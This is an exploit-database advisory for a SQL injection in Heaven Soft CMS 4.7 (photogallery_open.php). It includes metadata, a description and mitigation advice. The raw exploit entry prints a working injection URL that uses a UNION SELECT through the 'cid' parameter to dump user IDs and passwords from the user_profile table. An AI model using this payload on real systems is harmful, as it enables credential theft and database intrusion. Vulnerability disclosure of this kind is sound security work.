Heaven Soft CMS v 4.7 (photogallery_open.php) SQL Injection Vulnerability

vendor:

Heaven Soft CMS

by:

CoBRa_21

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Heaven Soft CMS

Affected Version From: 4.7

Affected Version To: 4.7

Patch Exists: NO

Related CWE: N/A

CPE: a:heavensoft:heaven_soft_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Heaven Soft CMS v 4.7 (photogallery_open.php) SQL Injection Vulnerability

A SQL injection vulnerability exists in Heaven Soft CMS v 4.7 (photogallery_open.php) which allows an attacker to execute arbitrary SQL commands via the 'cid' parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------------
 
Heaven Soft CMS v 4.7 (photogallery_open.php) SQL Injection Vulnerability
 
-------------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Mail: uyku_cu@windowslive.com
 
Script Home: http://www.heavensoft.com.pk/

-------------------------------------------------------------------------------------------
 
Sql Injection:
 
http://localhost/[path]/photogallery_open.php?cid=-10%20union%20select%20group_concat%28user_id,0x3a,password%29+from+user_profile--

-------------------------------------------------------------------------------------------

Melekler Bize Aglar , Biz Halimize Guleriz......